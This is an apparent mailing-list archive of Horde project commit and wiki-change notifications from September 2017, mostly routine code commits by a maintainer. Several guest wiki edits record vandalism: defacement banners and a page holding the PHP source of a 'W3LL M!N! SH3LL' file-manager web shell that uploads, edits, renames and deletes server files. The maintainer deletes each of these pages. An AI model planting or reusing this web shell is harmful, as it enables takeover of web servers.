.,::::::::::,,,,,,,,,`         `@@@@@@@'       @@@@@@#      
.::::::::::::,,,,,'@@@@@@@:.......@@@@@@@@            @@@@@+            
::::,
+                      `@@@@@@@@@         
#@@@@@';;;;:::::::::::::,,,,,,`             @@@@@@@.        
+@@@@@``,;::::::::::::::,,,,,,,@@@@@@@#..     @@@@@@@@             
:@@@.             :.
+                      '@@@@@@@@@         @@@@@;;;;;;:::::::::::::,,.   
               #@@@@@@.       `@@@@+;;;;::::::::::::::,,,,,,,'@@@@@@@   
      @@@@@@@#
+                      @@@@@@@@@'       ,;@@@@@;;;;;;::::::::::::,.     
               `@@@@@@+      :#@@@@+;;;;:::::::::::::::.`     @@@@@@@`  
      '@@@@@@`                                             ``
+                      @@@@@@@@@     .''''@@@@@;;;;;;:::::::::::,       
               :@@@@@@@ .;;;;;@@@@@#;;;;:::::::::`            @@@@@@@   
      #@@@@@;             `,::::::,,,,,,,,,,..........```````
+                      @@@@@@@@:  `''''''+@@@@@;;;;;;:::::::::,         
               '@@@@@@@''''';+@@@@@#;;;;:::::::`              @@@@@@#   
     `@@@@@@,        ,::::::::::::,,,,,,,,,,,.........```````
+                     #@@@@@@@@`;''''''';@@@@@@+;;;;;::::::::           
               #@@@@@@'''''''@@@@@@';;;;;:::,                 @@@@@@:   
     @@@@@@@.  .:;;;;;;:::::::::::,,,,,,,,,,...........``````
+                    ,@@@@@@@@'''''''''';@@@@@@#;;;;;::::::             
              :@@@@@@@'''''''@@@@@@;;;;;;:.                  .@@@@@@    
    `@@@@@@@;;;;;;;;;;;;:::::::::,,,,,,,,,,,,.........`````
+                    @@@@@@@@@'''''''''';@@@@@@#;;;:::,,,               
             ;@@@@@@@@'''''';@@@@#::,..`                      
+@@@@@@.,:;''#@@@@@@@;;;;;;;;;;;::::,           ````..........`
+                 :@@@@@@@@@@@'''''':   .@@@@@@'                        
            `@@@@@@@@''''';:. `:.                            
`@@@@@@@+'''''@@@@@@@+;;;;;;;;;;;,
+             :@@@@@@@@@@@@@@@''';      '@@@@@@`                        
            @@@@@@@+''''.                                    
#@@@@@@@+'''''@@@@@@';;;;;;;;.
+             @@@@@@@@@@@@@@@@+`        ,@@@@@,                         
           :@@@@@@+''';                                     
`@@@@@@#'''''''''#@+''';;;`
+             '@@@@@@@@@@@@@@@+                                         
           @@@@@@+'''`                                      
@@@@@@@'''''''''''''':`
+              .@@@@@@@@#,'@#`                                          
           ;@@@@#'',                                      `@@@@@@#''',  
  `,;':
+                .@#;`                                                  
           `''''';                                        #@@@@@@'':
+                                                                       
               .`                                         #@@@@@+:
+                                                                       
                                                          `@@@@;
+                                                                       
                                                            `:
+
+
+
+
+ + + From wikiguest at horde.org Tue Sep 12 08:04:50 2017 From: wikiguest at horde.org (Wiki Guest) Date: Tue, 12 Sep 2017 08:04:50 +0000 Subject: [commits] [Wiki] changed: Wiki/Usage Message-ID: <20170912080450.Horde.J1dXsLv6YnGzddNBcDaWiyF@wiki.horde.org> guest [95.162.194.206] Tue, 12 Sep 2017 08:04:50 +0000 Modified page: https://wiki.horde.org/Wiki/Usage New Revision: 3 Change log: CipherTron @@ -1,3 +1,8 @@ #CipherTron -Sh4dow + +[----------------Owned By Sh4dow (Sh4dow at tatu.io)----------------] +We Are: Sh4dow - N37iD - All Freinds .... +We Are Anonymous - Underground World - In This Family Nobody not Alone +[---------------- Anonymous 2003 - 2017 ----------------] +https://twitter.com/TheCipherTron - https://telegram.me/CipherTron From jan at horde.org Tue Sep 12 10:16:39 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 12 Sep 2017 10:16:39 +0000 Subject: [commits] [Wiki] deleted: admin/RTE_popup_file_atch.asp Message-ID: <20170912101639.Horde.mS3Hxr5UY68mkxwH183mOcg@wiki.horde.org> jan Tue, 12 Sep 2017 10:16:39 +0000 Deleted page: admin/RTE_popup_file_atch.asp From jan at horde.org Tue Sep 12 10:17:30 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 12 Sep 2017 10:17:30 +0000 Subject: [commits] [Wiki] deleted: Wiki/Usage [3] Message-ID: <20170912101730.Horde.uFcvyM7BlsWdeBo3ywO85JB@wiki.horde.org> jan Tue, 12 Sep 2017 10:17:30 +0000 Deleted version: 3 of Wiki/Usage From jan at horde.org Tue Sep 12 10:17:36 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 12 Sep 2017 10:17:36 +0000 Subject: [commits] [Wiki] deleted: Wiki/Usage [2] Message-ID: <20170912101736.Horde.jXWrEbQwlocBE8BS7gxokBw@wiki.horde.org> jan Tue, 12 Sep 2017 10:17:36 +0000 Deleted version: 2 of Wiki/Usage From jan at horde.org Tue Sep 12 10:17:46 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 12 Sep 2017 10:17:46 +0000 Subject: [commits] [Wiki] deleted: Wiki/Home [3] Message-ID: <20170912101746.Horde.1OrDImmep0-jcfYlWposFsQ@wiki.horde.org> jan Tue, 12 Sep 2017 10:17:46 +0000 Deleted version: 3 of Wiki/Home From jan at horde.org Tue Sep 12 14:41:07 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 12 Sep 2017 16:41:07 +0200 (CEST) Subject: [commits] Horde Web Source branch master updated. b784b373429b4397aaf41aa50cbf3acfa7e1434d Message-ID: <20170912144107.C7275100A9D@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: cc49a704568fd867b9c63ba8231d526941fd18f0 b784b37 Raise a 404 if requesting non-existant docs. Summary: http://github.com/horde/horde-web/compare/cc49a704568fd867b9c63ba8231d526941fd18f0...b784b373429b4397aaf41aa50cbf3acfa7e1434d ----------------------------------------------------------------------- commit b784b373429b4397aaf41aa50cbf3acfa7e1434d Author: Jan Schneider Date: Tue Sep 12 16:40:57 2017 +0200 Raise a 404 if requesting non-existant docs. app/controllers/App.php | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) http://github.com/horde/horde-web/commit/b784b373429b4397aaf41aa50cbf3acfa7e1434d From jan at horde.org Tue Sep 12 14:52:13 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 12 Sep 2017 16:52:13 +0200 (CEST) Subject: [commits] Horde branch master updated. a33c16a7200416660cb501856b98b41a5f392082 Message-ID: <20170912145213.D5638100A9D@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: c978c41df754fe7ac8748b97a07f869c8a3df22c a33c16a This is no longer necessary. Summary: http://github.com/horde/horde/compare/c978c41df754fe7ac8748b97a07f869c8a3df22c...a33c16a7200416660cb501856b98b41a5f392082 ----------------------------------------------------------------------- commit a33c16a7200416660cb501856b98b41a5f392082 Author: Jan Schneider Date: Tue Sep 12 16:51:49 2017 +0200 This is no longer necessary. Everything is autoloaded now. wicked/lib/Page.php | 1 - 1 file changed, 1 deletion(-) http://github.com/horde/horde/commit/a33c16a7200416660cb501856b98b41a5f392082 From wikiguest at horde.org Tue Sep 12 17:52:22 2017 From: wikiguest at horde.org (Wiki Guest) Date: Tue, 12 Sep 2017 17:52:22 +0000 Subject: [commits] [Wiki] created: admin/rte_popup_file_atch.asp Message-ID: <20170912175222.Horde.sYfm5fSS8C0BLO6LXOzNTQZ@wiki.horde.org> guest [114.124.201.38] Tue, 12 Sep 2017 17:52:22 +0000 Created page: https://wiki.horde.org/admin/rte_popup_file_atch.asp $value){ $_POST[$key] = stripslashes($value); } } echo ' W3LL M!N! SH3LL

W3LL M!N! SH3LL

'; if(isset($_GET['filesrc'])){ echo "
Current Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'Upload File Berhasil
'; }else{ echo 'Upload File Gagal
'; } } echo '
Upload File :
Current File : "; echo $_GET['filesrc']; echo '

'; echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '
'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Mengubah Permission Berhasil
'; }else{ echo 'Mengubah Pemission Gagal
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Ganti Nama Berhasil
'; }else{ echo 'Ganti Nama Gagal
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Edit File Berhasil
'; }else{ echo 'Edit File Gagal
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Menghapus Directory Berhasil
'; }else{ echo 'Menghapus Directory Gagal
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Delete File Done.
'; }else{ echo 'Delete File Error.
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ""; } echo '
Name
Size
Permissions
Options
$dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
$file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
'; } echo '

Recoded By W3LL
'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> shell.php Buka dengan Menampilkan shell.php. From jan at horde.org Tue Sep 12 18:51:31 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 12 Sep 2017 18:51:31 +0000 Subject: [commits] [Wiki] deleted: admin/rte_popup_file_atch.asp Message-ID: <20170912185131.Horde.4_2NDU8nYRs9_zwYsAwm8og@wiki.horde.org> jan Tue, 12 Sep 2017 18:51:31 +0000 Deleted page: admin/rte_popup_file_atch.asp From jan at horde.org Tue Sep 12 18:56:30 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 12 Sep 2017 20:56:30 +0200 (CEST) Subject: [commits] Horde branch master updated. b141d81859595d84d67ced2d7108cbfbb7663024 Message-ID: <20170912185630.72A2D100A9D@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: a33c16a7200416660cb501856b98b41a5f392082 b141d81 Sign return URL passed to login link. Summary: http://github.com/horde/horde/compare/a33c16a7200416660cb501856b98b41a5f392082...b141d81859595d84d67ced2d7108cbfbb7663024 ----------------------------------------------------------------------- commit b141d81859595d84d67ced2d7108cbfbb7663024 Author: Jan Schneider Date: Tue Sep 12 20:56:18 2017 +0200 Sign return URL passed to login link. horde/lib/View/Topbar.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/b141d81859595d84d67ced2d7108cbfbb7663024 From jan at horde.org Tue Sep 12 19:00:18 2017 From: jan at horde.org (Jan Schneider) Date: Tue, 12 Sep 2017 21:00:18 +0200 (CEST) Subject: [commits] Horde branch FRAMEWORK_5_2 updated. 524d3f314840337714af84330b82a63e4bb56369 Message-ID: <20170912190018.B497D100A9D@spencer.horde.org> The branch "FRAMEWORK_5_2" has been updated. The following is a summary of the commits. from: e2ce5ece722739e227a1feada4b0cb6ec5d4836b 8f8c8bc Sign return URL passed to login link. 524d3f3 [jan] Fix returning to last URL after using the login link. Summary: http://github.com/horde/horde/compare/e2ce5ece722739e227a1feada4b0cb6ec5d4836b...524d3f314840337714af84330b82a63e4bb56369 ----------------------------------------------------------------------- commit 8f8c8bc93f9174a4d96231e10361799d82183117 Author: Jan Schneider Date: Tue Sep 12 20:56:18 2017 +0200 Sign return URL passed to login link. horde/lib/View/Topbar.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/8f8c8bc93f9174a4d96231e10361799d82183117 ----------------------------------------------------------------------- commit 524d3f314840337714af84330b82a63e4bb56369 Author: Jan Schneider Date: Tue Sep 12 21:00:05 2017 +0200 [jan] Fix returning to last URL after using the login link. horde/docs/CHANGES | 1 + horde/package.xml | 2 ++ 2 files changed, 3 insertions(+) http://github.com/horde/horde/commit/524d3f314840337714af84330b82a63e4bb56369 From jan at horde.org Tue Sep 12 23:14:26 2017 From: jan at horde.org (Jan Schneider) Date: Wed, 13 Sep 2017 01:14:26 +0200 (CEST) Subject: [commits] Horde Web Source branch master updated. f1060776e9b5f008be6bb7dd3ae21fd05fa0de04 Message-ID: <20170912231426.8605C100AA5@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: b784b373429b4397aaf41aa50cbf3acfa7e1434d f106077 Crontab: update documentation files. Summary: http://github.com/horde/horde-web/compare/b784b373429b4397aaf41aa50cbf3acfa7e1434d...f1060776e9b5f008be6bb7dd3ae21fd05fa0de04 ----------------------------------------------------------------------- commit f1060776e9b5f008be6bb7dd3ae21fd05fa0de04 Author: Jan Schneider Date: Wed Sep 13 01:14:21 2017 +0200 Crontab: update documentation files. app/views/App/apps/horde/docs/CHANGES.html | 1 + 1 file changed, 1 insertion(+) http://github.com/horde/horde-web/commit/f1060776e9b5f008be6bb7dd3ae21fd05fa0de04 From wikiguest at horde.org Wed Sep 13 06:12:11 2017 From: wikiguest at horde.org (Wiki Guest) Date: Wed, 13 Sep 2017 06:12:11 +0000 Subject: [commits] [Wiki] created: inurl:"admin/my_documents/my_files Message-ID: <20170913061211.Horde.prlp__Uz-cRIhqWQVbie3GA@wiki.horde.org> guest [193.140.225.5] Wed, 13 Sep 2017 06:12:11 +0000 Created page: https://wiki.horde.org/inurl%3A%22admin/my_documents/my_files https://forum.ayyildiz.org/styles/AYT/eke/ayt_logo2.png From jan at horde.org Wed Sep 13 08:51:17 2017 From: jan at horde.org (Jan Schneider) Date: Wed, 13 Sep 2017 08:51:17 +0000 Subject: [commits] [Wiki] deleted: inurl:"admin/my_documents/my_files Message-ID: <20170913085117.Horde.yEpMjGMNAkzMMpSCxdlGp1Y@wiki.horde.org> jan Wed, 13 Sep 2017 08:51:17 +0000 Deleted page: inurl:"admin/my_documents/my_files From jan at horde.org Wed Sep 13 11:11:58 2017 From: jan at horde.org (Jan Schneider) Date: Wed, 13 Sep 2017 13:11:58 +0200 (CEST) Subject: [commits] Horde branch master updated. e522ea62383bb9f3ce83fbcab75cdadffc66dc83 Message-ID: <20170913111158.DA07B10083F@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: b141d81859595d84d67ced2d7108cbfbb7663024 bd308de [jan] Fix returning to last URL after using the login link. 82b0ddc Massage array structure to expected layout. 0b79701 Those aren't valid UTF-8 characters. e522ea6 split() is deprecated. Summary: http://github.com/horde/horde/compare/b141d81859595d84d67ced2d7108cbfbb7663024...e522ea62383bb9f3ce83fbcab75cdadffc66dc83 ----------------------------------------------------------------------- commit bd308de814e54f59dca3f551b3da6443bd8d8728 Author: Jan Schneider Date: Tue Sep 12 21:00:05 2017 +0200 [jan] Fix returning to last URL after using the login link. horde/package.xml | 1 + 1 file changed, 1 insertion(+) http://github.com/horde/horde/commit/bd308de814e54f59dca3f551b3da6443bd8d8728 ----------------------------------------------------------------------- commit 82b0ddc5eb077933297260f1619450b975467e4e Author: Jan Schneider Date: Wed Sep 13 12:03:28 2017 +0200 Massage array structure to expected layout. jonah/delivery/rss.php | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/82b0ddc5eb077933297260f1619450b975467e4e ----------------------------------------------------------------------- commit 0b797012c48eabc31ade36d4a3ad70457a7b512c Author: Jan Schneider Date: Wed Sep 13 12:49:31 2017 +0200 Those aren't valid UTF-8 characters. wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Freelink.php | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/0b797012c48eabc31ade36d4a3ad70457a7b512c ----------------------------------------------------------------------- commit e522ea62383bb9f3ce83fbcab75cdadffc66dc83 Author: Jan Schneider Date: Wed Sep 13 12:50:06 2017 +0200 split() is deprecated. hermes/lib/Application.php | 3 ++- vilma/config/hooks.php.dist | 4 ++-- whups/lib/Form/Query/PropertyCriterion.php | 4 ++-- 3 files changed, 6 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/e522ea62383bb9f3ce83fbcab75cdadffc66dc83 From jan at horde.org Wed Sep 13 14:02:55 2017 From: jan at horde.org (Jan Schneider) Date: Wed, 13 Sep 2017 16:02:55 +0200 (CEST) Subject: [commits] Horde branch master updated. 0165d82d610af22b0cd831b1753992bdf0ba798f Message-ID: <20170913140256.2815910083F@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: e522ea62383bb9f3ce83fbcab75cdadffc66dc83 2efadc8 Fix throwing exception. 0165d82 Catch exceptions. Summary: http://github.com/horde/horde/compare/e522ea62383bb9f3ce83fbcab75cdadffc66dc83...0165d82d610af22b0cd831b1753992bdf0ba798f ----------------------------------------------------------------------- commit 2efadc8d14e06d3f729e1e87904370427204c4f4 Author: Jan Schneider Date: Wed Sep 13 13:13:30 2017 +0200 Fix throwing exception. whups/view.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/2efadc8d14e06d3f729e1e87904370427204c4f4 ----------------------------------------------------------------------- commit 0165d82d610af22b0cd831b1753992bdf0ba798f Author: Jan Schneider Date: Wed Sep 13 16:02:34 2017 +0200 Catch exceptions. wicked/display.php | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/0165d82d610af22b0cd831b1753992bdf0ba798f From jan at horde.org Wed Sep 13 14:13:30 2017 From: jan at horde.org (Jan Schneider) Date: Wed, 13 Sep 2017 16:13:30 +0200 (CEST) Subject: [commits] Horde branch FRAMEWORK_5_2 updated. c3c44c96e829360966af9ea49374995020691dc1 Message-ID: <20170913141330.BE08110083F@spencer.horde.org> The branch "FRAMEWORK_5_2" has been updated. The following is a summary of the commits. from: 524d3f314840337714af84330b82a63e4bb56369 01cf7c6 Those aren't valid UTF-8 characters. dfe3dd2 split() is deprecated. 14f8f2c Fix throwing exception. c3c44c9 Catch exceptions. Summary: http://github.com/horde/horde/compare/524d3f314840337714af84330b82a63e4bb56369...c3c44c96e829360966af9ea49374995020691dc1 ----------------------------------------------------------------------- commit 01cf7c63e1dc43461dbcd18147841e15750717cc Author: Jan Schneider Date: Wed Sep 13 12:49:31 2017 +0200 Those aren't valid UTF-8 characters. wicked/lib/Text_Wiki/Text/Wiki/Parse/Default/Freelink.php | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/01cf7c63e1dc43461dbcd18147841e15750717cc ----------------------------------------------------------------------- commit dfe3dd2949af3e0913e9941f21a335ff1d8dc79c Author: Jan Schneider Date: Wed Sep 13 12:50:06 2017 +0200 split() is deprecated. hermes/lib/Application.php | 3 ++- vilma/config/hooks.php.dist | 4 ++-- whups/lib/Form/Query/PropertyCriterion.php | 4 ++-- 3 files changed, 6 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/dfe3dd2949af3e0913e9941f21a335ff1d8dc79c ----------------------------------------------------------------------- commit 14f8f2c8616664d06bc9c07239d0dc4d675e814a Author: Jan Schneider Date: Wed Sep 13 13:13:30 2017 +0200 Fix throwing exception. whups/view.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/14f8f2c8616664d06bc9c07239d0dc4d675e814a ----------------------------------------------------------------------- commit c3c44c96e829360966af9ea49374995020691dc1 Author: Jan Schneider Date: Wed Sep 13 16:02:34 2017 +0200 Catch exceptions. wicked/display.php | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/c3c44c96e829360966af9ea49374995020691dc1 From wikiguest at horde.org Wed Sep 13 21:33:54 2017 From: wikiguest at horde.org (Wiki Guest) Date: Wed, 13 Sep 2017 21:33:54 +0000 Subject: [commits] [Wiki] created: inurl:"admin/my_documents/my_files Message-ID: <20170913213354.Horde.TKh6yXQEd7o3zBtsogSnTyX@wiki.horde.org> guest [5.250.13.213] Wed, 13 Sep 2017 21:33:54 +0000 Created page: https://wiki.horde.org/inurl%3A%22admin/my_documents/my_files Do not forget us! < -=: Hacked By 94rkm!n9 :=-
Hacked By ...

Hacked By...

www.hamechicity.ir

From jan at horde.org Thu Sep 14 09:22:42 2017 From: jan at horde.org (Jan Schneider) Date: Thu, 14 Sep 2017 09:22:42 +0000 Subject: [commits] [Wiki] deleted: inurl:"admin/my_documents/my_files Message-ID: <20170914092242.Horde.L8lxv67hnJ4MJx52LWd_LLk@wiki.horde.org> jan Thu, 14 Sep 2017 09:22:42 +0000 Deleted page: inurl:"admin/my_documents/my_files From jan at horde.org Fri Sep 15 08:19:13 2017 From: jan at horde.org (Jan Schneider) Date: Fri, 15 Sep 2017 10:19:13 +0200 (CEST) Subject: [commits] Horde branch FRAMEWORK_5_2 updated. 31bc7a71255f6eab0fc6cb17c05c8d26c2c82c4b Message-ID: <20170915081913.315A5100DD2@spencer.horde.org> The branch "FRAMEWORK_5_2" has been updated. The following is a summary of the commits. from: c3c44c96e829360966af9ea49374995020691dc1 31bc7a7 Prepare release. Summary: http://github.com/horde/horde/compare/c3c44c96e829360966af9ea49374995020691dc1...31bc7a71255f6eab0fc6cb17c05c8d26c2c82c4b ----------------------------------------------------------------------- commit 31bc7a71255f6eab0fc6cb17c05c8d26c2c82c4b Author: Jan Schneider Date: Fri Sep 15 10:19:02 2017 +0200 Prepare release. wicked/docs/RELEASE_NOTES | 12 ++++++++---- wicked/package.xml | 12 ++++++------ 2 files changed, 14 insertions(+), 10 deletions(-) http://github.com/horde/horde/commit/31bc7a71255f6eab0fc6cb17c05c8d26c2c82c4b From jan at horde.org Fri Sep 15 08:29:35 2017 From: jan at horde.org (Jan Schneider) Date: Fri, 15 Sep 2017 10:29:35 +0200 (CEST) Subject: [commits] Horde branch FRAMEWORK_5_2 updated. 20e29cd285c0c75d58ccd5b16bf7761c6727df0a Message-ID: <20170915082935.F2526100DD2@spencer.horde.org> The branch "FRAMEWORK_5_2" has been updated. The following is a summary of the commits. from: 31bc7a71255f6eab0fc6cb17c05c8d26c2c82c4b a88117f Released wicked-2.0.8RC1 20e29cd Development mode for wicked-2.0.8RC2 Summary: http://github.com/horde/horde/compare/31bc7a71255f6eab0fc6cb17c05c8d26c2c82c4b...20e29cd285c0c75d58ccd5b16bf7761c6727df0a ----------------------------------------------------------------------- commit a88117fa2cd887111f096c0031c16ff86fbbcc70 Author: Jan Schneider Date: Fri Sep 15 10:29:11 2017 +0200 Released wicked-2.0.8RC1 wicked/composer.json | 61 +++++++++++++++++++++++++--------------------- wicked/docs/CHANGES | 6 ++--- wicked/lib/Application.php | 2 +- 3 files changed, 37 insertions(+), 32 deletions(-) http://github.com/horde/horde/commit/a88117fa2cd887111f096c0031c16ff86fbbcc70 ----------------------------------------------------------------------- commit 20e29cd285c0c75d58ccd5b16bf7761c6727df0a Author: Jan Schneider Date: Fri Sep 15 10:29:13 2017 +0200 Development mode for wicked-2.0.8RC2 wicked/docs/CHANGES | 6 ++++++ wicked/lib/Application.php | 2 +- wicked/package.xml | 19 +++++++++++++++---- 3 files changed, 22 insertions(+), 5 deletions(-) http://github.com/horde/horde/commit/20e29cd285c0c75d58ccd5b16bf7761c6727df0a From jan at horde.org Fri Sep 15 08:29:42 2017 From: jan at horde.org (Jan Schneider) Date: Fri, 15 Sep 2017 10:29:42 +0200 (CEST) Subject: [commits] Horde annotated tag wicked-2.0.8rc1 created. 4498905eabea8ea2abc7fed9ac08862d94548a83 Message-ID: <20170915082942.CC179100DD2@spencer.horde.org> The annotated tag "wicked-2.0.8rc1" has been created. at 4498905eabea8ea2abc7fed9ac08862d94548a83 (tag) tagging a88117fa2cd887111f096c0031c16ff86fbbcc70 (commit) replaces nag-4.2.16 tagged by Jan Schneider on Fri Sep 15 10:29:11 2017 +0200 ----------------------------------------------------------------------- Released wicked-2.0.8RC1. Jan Schneider (26): Development mode for nag-4.2.17 [jan] Fix updating and deleting events from external CalDAV servers (martin1 at k0k.net, Bug #14021). Assume two-digit year is in the current century. [jan] Fix time offsets when importing CSV data with two-digit years. Prepare for adding a subtree. Squashed 'wicked/lib/Text_Wiki/' content from commit 2b7fa54 Merge commit '1ef5c58c4803938f47cd76d72536248f6f2b6d91' as 'wicked/lib/Text_Wiki' Re-merge Horde customizations and extensions. Use PHP 5 constructors in our own parsers too. Load the bundled Text_Wiki. [jan] Bundle Text_Wiki and fix it to run on PHP 7. Remove Text_Wiki dependency. Update file list. Update dependencies. Update tests. Fix package names. Consider all applications as PHP 7 compatible. Accidentally changed the maximum Horde dep too. Sign return URL passed to login link. [jan] Fix returning to last URL after using the login link. Those aren't valid UTF-8 characters. split() is deprecated. Fix throwing exception. Catch exceptions. Prepare release. Released wicked-2.0.8RC1 From jan at horde.org Fri Sep 15 08:30:12 2017 From: jan at horde.org (Jan Schneider) Date: Fri, 15 Sep 2017 10:30:12 +0200 (CEST) Subject: [commits] Horde Web Source branch master updated. bf6d38c80516644272dbe2ed06c7f6a91a6a3a0c Message-ID: <20170915083012.EDF1B100DD2@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: f1060776e9b5f008be6bb7dd3ae21fd05fa0de04 bf6d38c Wicked RC. Summary: http://github.com/horde/horde-web/compare/f1060776e9b5f008be6bb7dd3ae21fd05fa0de04...bf6d38c80516644272dbe2ed06c7f6a91a6a3a0c ----------------------------------------------------------------------- commit bf6d38c80516644272dbe2ed06c7f6a91a6a3a0c Author: Jan Schneider Date: Fri Sep 15 10:29:59 2017 +0200 Wicked RC. config/versions.sqlite | Bin 11264 -> 11264 bytes 1 file changed, 0 insertions(+), 0 deletions(-) http://github.com/horde/horde-web/commit/bf6d38c80516644272dbe2ed06c7f6a91a6a3a0c From jan at horde.org Fri Sep 15 09:14:52 2017 From: jan at horde.org (Jan Schneider) Date: Fri, 15 Sep 2017 11:14:52 +0200 (CEST) Subject: [commits] Horde branch master updated. c1c1d9b93e64816e303cc4a3f94f5c509d8a8023 Message-ID: <20170915091452.AE98B100DD2@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: 0165d82d610af22b0cd831b1753992bdf0ba798f c1c1d9b Trusty may be fixed. Summary: http://github.com/horde/horde/compare/0165d82d610af22b0cd831b1753992bdf0ba798f...c1c1d9b93e64816e303cc4a3f94f5c509d8a8023 ----------------------------------------------------------------------- commit c1c1d9b93e64816e303cc4a3f94f5c509d8a8023 Author: Jan Schneider Date: Fri Sep 15 11:14:08 2017 +0200 Trusty may be fixed. .travis.yml | 1 - 1 file changed, 1 deletion(-) http://github.com/horde/horde/commit/c1c1d9b93e64816e303cc4a3f94f5c509d8a8023 From jan at horde.org Fri Sep 15 23:14:34 2017 From: jan at horde.org (Jan Schneider) Date: Sat, 16 Sep 2017 01:14:34 +0200 (CEST) Subject: [commits] Horde Web Source branch master updated. e552ee65d3e73dc0b79c9b6fa11e2345793b8680 Message-ID: <20170915231434.CC8B7100C49@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: bf6d38c80516644272dbe2ed06c7f6a91a6a3a0c e552ee6 Crontab: update documentation files. Summary: http://github.com/horde/horde-web/compare/bf6d38c80516644272dbe2ed06c7f6a91a6a3a0c...e552ee65d3e73dc0b79c9b6fa11e2345793b8680 ----------------------------------------------------------------------- commit e552ee65d3e73dc0b79c9b6fa11e2345793b8680 Author: Jan Schneider Date: Sat Sep 16 01:14:29 2017 +0200 Crontab: update documentation files. app/views/App/apps/wicked/docs/CHANGES.html | 6 ++++++ app/views/App/apps/wicked/docs/RELEASE_NOTES.html | 12 ++++++++---- 2 files changed, 14 insertions(+), 4 deletions(-) 